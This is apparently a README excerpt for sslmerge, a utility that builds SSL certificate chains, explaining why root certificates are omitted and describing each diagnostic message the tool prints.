Because self-signed root certificates need not/should not be included in web server configuration. They serve no purpose (clients will always ignore them) and they incur a slight performance (latency) penalty because they increase the size of the SSL handshake.
If you want to add a root certificate to the certificate chain, call the utility with the --with-root parameter.

Certification Paths
Sslmerge allows use of two certification paths:

Output comments
When generating the chain of certificates, sslmerge displays comments with information about certificates, including any errors.
Here is a list of all possibilities:

not found identity (end-user, server) certificate
The message is displayed in the absence of a server certificate that is the beginning of the chain. This is a unique case because in this situation the sslmerge ends its operation displaying only this information. The server certificate is the only certificate required to correctly create a chain. Without this certificate, the correct chain will not be created.

found correct identity (end-user, server) certificate
The reverse situation here - message displayed when a valid server certificate is found.

not found first intermediate certificate
This message appears when the first of the two intermediate certificates is not found. This information does not explicitly specify the absence of a second intermediate certificate and on the other hand it allows to determine whether the intermediate certificate to which the server certificate was signed exists. Additionally, it can be displayed if the second intermediate certificate has been delivered.

not found second intermediate certificate
Similar to the above, however, it concerns the second intermediate certificate. However, it is possible to create the chain correctly using the second certification path, e.g. using the first intermediate certificate and replacing the second with the main certificate.

one or more intermediate certificate not found
This message means that one or all of the required intermediate certificates are missing and displayed in the absence of the root certificate.

found 'n' correct intermediate certificate(s)
This message indicates the number of valid intermediate certificates.

not found correct root certificate
The lack of the root certificate is treated as a warning. Of course, when configuring certificates on the server side, it is not recommended to attach a root certificate, but if you create it with the sslmerge, it treats the chain as incomplete displaying information about the incorrect creation of the chain.

an empty CN field was found in one of the certificates
This message does not inform about the error and about the lack of the CN field what can happen with some certificates (look at example/google.com). Common Name field identifies the host name associated with the certificate. There is no requirement in RFC3280 for an Issuer DN to have a CN. Most CAs do include a CN in the Issuer DN, but some don't, such as this Equifax CA.

Requirements
Sslmerge uses external utilities to be installed before running:

Other

Contributing
See this.

Project architecture
See this.


Continue reading